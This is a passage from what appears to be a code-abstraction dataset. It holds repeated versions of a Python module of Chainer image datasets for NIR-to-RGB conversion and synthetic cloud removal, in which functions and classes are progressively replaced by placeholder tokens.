1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n\n\ndef train_test_dataset(train_class_name, args_train, test_class_name, args_test\n ):\n mod_name = os.path.splitext(os.path.basename(__file__))[0]\n mod_path = os.path.dirname(__file__)\n sys.path.insert(0, mod_path)\n train_class = getattr(__import__(mod_name), train_class_name)\n test_class = getattr(__import__(mod_name), test_class_name)\n train = train_class(**args_train)\n test = test_class(**args_test)\n return train, test\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n <function token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n <function token>\n\n def __len__(self):\n return len(self.rgb)\n <function token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n <function token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, 